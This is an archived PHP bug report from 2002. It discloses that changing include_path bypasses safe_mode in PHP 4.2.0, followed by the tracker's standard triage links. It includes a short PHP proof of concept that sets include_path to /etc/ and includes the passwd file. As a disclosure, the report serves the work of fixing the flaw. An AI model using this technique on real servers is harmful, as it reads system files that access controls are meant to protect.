Bug #17169: include_path allows bypass of safe_mode

Sun, 12 May 2002 15:59:57 -0700 

From:             [EMAIL PROTECTED]
Operating system: Linux 2.4.18
PHP version:      4.2.0
PHP Bug Type:     Performance problem
Bug description:  include_path allows bypass of safe_mode

By setting include_path setting to any directory readable to the webserver
it is possible to read files from the directory regardless of safe_mode
limitations.

Ex.
<?php
      ini_set('include_path', '/etc/');
      include('passwd');
?>
-- 
Edit bug report at http://bugs.php.net/?id=17169&edit=1
-- 
Fixed in CVS:        http://bugs.php.net/fix.php?id=17169&r=fixedcvs
Fixed in release:    http://bugs.php.net/fix.php?id=17169&r=alreadyfixed
Need backtrace:      http://bugs.php.net/fix.php?id=17169&r=needtrace
Try newer version:   http://bugs.php.net/fix.php?id=17169&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=17169&r=support
Expected behavior:   http://bugs.php.net/fix.php?id=17169&r=notwrong
Not enough info:     http://bugs.php.net/fix.php?id=17169&r=notenoughinfo
Submitted twice:     http://bugs.php.net/fix.php?id=17169&r=submittedtwice
register_globals:    http://bugs.php.net/fix.php?id=17169&r=globals

Reply via email to